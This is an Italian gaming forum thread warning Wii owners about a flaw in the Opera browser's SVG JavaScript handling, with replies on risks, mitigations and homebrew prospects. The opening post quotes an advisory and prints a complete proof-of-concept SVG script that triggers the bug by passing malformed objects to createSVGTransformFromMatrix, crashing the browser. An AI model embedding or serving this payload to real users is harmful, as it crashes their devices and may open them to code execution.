Attenzione a navigare con opera su WII
  • In diretta da GamesVillage.it
    • News
    • -
    • In Evidenza
    • -
    • Recensioni
    • -
    • RetroGaming
    • -
    • Anteprime
    • -
    • Video
    • -
    • Cinema

Pag 1 di 2 12 UltimoUltimo
Visualizzazione risultati da 1 a 15 di 25

Discussione: Attenzione a navigare con opera su WII

Cambio titolo
  1. #1
    Utente L'avatar di Tamiyadd
    Registrato il
    05-03
    Messaggi
    601

    Attenzione a navigare con opera su WII

    NON CLICCATE ASSOLUTAMENTE CON IL WII NEL LINK CITATO NEL QUOTE PERCHE' VI MANDERA' IN CRASH IL WII

    A flaw exists within Opera's Javascript SVG implementation. When processing a createSVGTransformFromMatrix request Opera does not properly validate the type of object passed to the function. Passing an incorrect object to this function can result in it using a pointer that is user controlled when it attempts to make the virtual function call.

    Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious JavaScript and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user.

    This exploit could possibly be used to run code on the Wii!

    If you would like to see this in action, surf to this site on your Wii browser and click HERE. This will cause your Wii to crash!!!

    Code:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
    "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

    <svg id="mySVG" width="100%" height="100%" version="1.1"
    xmlns="http://www.w3.org/2000/svg">

    <rect width="300" height="100"
    style="fill:rgb(0,0,255);stroke-width:1;
    stroke:rgb(0,0,0)"/>

    <script>
    var svg = document.getElementById("mySVG");
    var matrix = svg.createSVGMatrix();
    var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};

    try{
    svg.createSVGTransformFromMatrix(matrix);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(randomObject);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(null);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(i);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(new Array(i));
    }catch(e){}
    </script>

    </svg>
    in poche parole attenzione a dove navigate perch&#232; basta che nella pagina sia inserito lo script sopra citato che chiunque malintenzionato pu&#242; aprire breccia nel wii e eseguire codice!!!

    fonte: http://wii.ps2-scene.org/
    Ultima modifica di Tamiyadd; 8-01-2007 alle 15:31:57
    Codice Wii: 0602 5321 5067 7476
    Codice Amico Pes 2008: 4639-8946-3311
    se volete aggiungermi e che vi aggiunga mandatemi un pm


    Non devo avere paura. La paura uccide la mente. La Paura è la piccola morte che porta con se l'annullamento totale.
    Guarderò in faccia la mia paura.
    Permetterò che mi calpesti e mi attraversi. E quando sarà passata, aprirò il mio occhio interiore e ne scruterò il percorso. Là dove andrà la paura non ci sarà più nulla. Solo io ci sarò

  2. #2
    Utente L'avatar di nintenleo
    Registrato il
    07-06
    Località
    Cingoli (MC)
    Messaggi
    7.807
    B&#232;,forse avresti fatto meglio a non postare lo script
    Cmq io col Wii in Internet nn ci vado quasi mai...e se ci vado al massimo vado su GR o sul sito di Nintendo.

  3. #3
    Utente L'avatar di Tamiyadd
    Registrato il
    05-03
    Messaggi
    601
    Citazione nintenleo
    Bè,forse avresti fatto meglio a non postare lo script
    Cmq io col Wii in Internet nn ci vado quasi mai...e se ci vado al massimo vado su GR o sul sito di Nintendo.
    lo script lo si può trovare tranquillamente ovunque quindi non è nulla di vietato
    Codice Wii: 0602 5321 5067 7476
    Codice Amico Pes 2008: 4639-8946-3311
    se volete aggiungermi e che vi aggiunga mandatemi un pm


    Non devo avere paura. La paura uccide la mente. La Paura è la piccola morte che porta con se l'annullamento totale.
    Guarderò in faccia la mia paura.
    Permetterò che mi calpesti e mi attraversi. E quando sarà passata, aprirò il mio occhio interiore e ne scruterò il percorso. Là dove andrà la paura non ci sarà più nulla. Solo io ci sarò

  4. #4
    Modero Me Stesso L'avatar di @lorenzosp@
    Registrato il
    04-05
    Località
    ROMA
    Messaggi
    971
    gulp!!!

  5. #5
    Utente L'avatar di nintenleo
    Registrato il
    07-06
    Località
    Cingoli (MC)
    Messaggi
    7.807
    Citazione Tamiyadd
    lo script lo si può trovare tranquillamente ovunque quindi non è nulla di vietato
    Ah...bè io nn ne sapevo niente

  6. #6
    Nintenfanatico orgoglioso L'avatar di Schaty-The World's Reason
    Registrato il
    05-06
    Messaggi
    2.148
    Si lo avevo letto gi&#224; da qualche parte, grazie per il consiglio
    Studente all'ISTITUTO EUROPEO DI DESIGN (IED)
    IO AMO NINTENDO perchè la torta del mio 18° compleanno era rappresentata da SUPER MARIO
    Schaty - The World's reason!!!





  7. #7
    Utente L'avatar di andrea'85
    Registrato il
    01-07
    Messaggi
    46
    grazie mille!
    ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!

  8. #8
    Utente L'avatar di Sunshine-128
    Registrato il
    08-03
    Località
    Rossano
    Messaggi
    4.305
    Come si fa ad evitare lo script?

    Sun.

  9. #9
    Bannato L'avatar di Jacchan
    Registrato il
    10-02
    Località
    Reggio nell' Emilia
    Messaggi
    12.968
    Citazione andrea'85
    grazie mille!
    ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!
    Beh, visto che si può pagare sulla VC pure con la carta di credito, oltre che coi points...

  10. #10
    Mezzala L'avatar di frankie85
    Registrato il
    02-05
    Località
    Asti
    Messaggi
    57.570
    In Opera non si puo' disabilitare il Javascript?

  11. #11
    Utente L'avatar di Tamiyadd
    Registrato il
    05-03
    Messaggi
    601
    Citazione andrea'85
    grazie mille!
    ma cosa succede di preciso se mi entrano nel wii?(a parte potermi fregare 200 wiipoints)!

    purtroppo penso possano farti crashare il wii se non danneggiarlo
    ma è una supposizione

    La cosa migliore per evitare rischi è navigare su siti attendibili purtroppo non ci sono ancora protezioni quindi per ora usate il wii solo per siti di cui vi potete fidare e per gli altri usate il pc
    Codice Wii: 0602 5321 5067 7476
    Codice Amico Pes 2008: 4639-8946-3311
    se volete aggiungermi e che vi aggiunga mandatemi un pm


    Non devo avere paura. La paura uccide la mente. La Paura è la piccola morte che porta con se l'annullamento totale.
    Guarderò in faccia la mia paura.
    Permetterò che mi calpesti e mi attraversi. E quando sarà passata, aprirò il mio occhio interiore e ne scruterò il percorso. Là dove andrà la paura non ci sarà più nulla. Solo io ci sarò

  12. #12
    Utente L'avatar di Tamiyadd
    Registrato il
    05-03
    Messaggi
    601
    chiederei ai moderatori, vista la seriet&#224; e la gravit&#224; della faccenda, di stickare il post in modo da rendere maggiormente visibile a tutti la notizia!!!
    Codice Wii: 0602 5321 5067 7476
    Codice Amico Pes 2008: 4639-8946-3311
    se volete aggiungermi e che vi aggiunga mandatemi un pm


    Non devo avere paura. La paura uccide la mente. La Paura è la piccola morte che porta con se l'annullamento totale.
    Guarderò in faccia la mia paura.
    Permetterò che mi calpesti e mi attraversi. E quando sarà passata, aprirò il mio occhio interiore e ne scruterò il percorso. Là dove andrà la paura non ci sarà più nulla. Solo io ci sarò

  13. #13
    Utente L'avatar di nintenleo
    Registrato il
    07-06
    Località
    Cingoli (MC)
    Messaggi
    7.807
    Dovrebbero inserirlo nel topic al TOP del Wii (quello di Megalo) se proprio nn possono stickarlo

  14. #14
    Utente L'avatar di °-Lord of Kaos-°
    Registrato il
    03-04
    Messaggi
    6.032
    Pi&#249; che altro si pensa che grazie a questo buco si riescir&#224; in futuro a far partire homebrew e .iso... quindi se siete interessati non vi conviene fare un futuro aggiornamento della console...

  15. #15
    Lurker L'avatar di M4X
    Registrato il
    08-05
    Località
    Trieste
    Messaggi
    1.507
    Citazione °-Lord of Kaos-°
    Più che altro si pensa che grazie a questo buco si riescirà in futuro a far partire homebrew e .iso... quindi se siete interessati non vi conviene fare un futuro aggiornamento della console...
    E perdere tutti i nuovi canali che inseriranno? No, grazie. Tanto a che servono le homebrew su una console casalinga?
    Ammaccabanane

Pag 1 di 2 12 UltimoUltimo

Regole di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •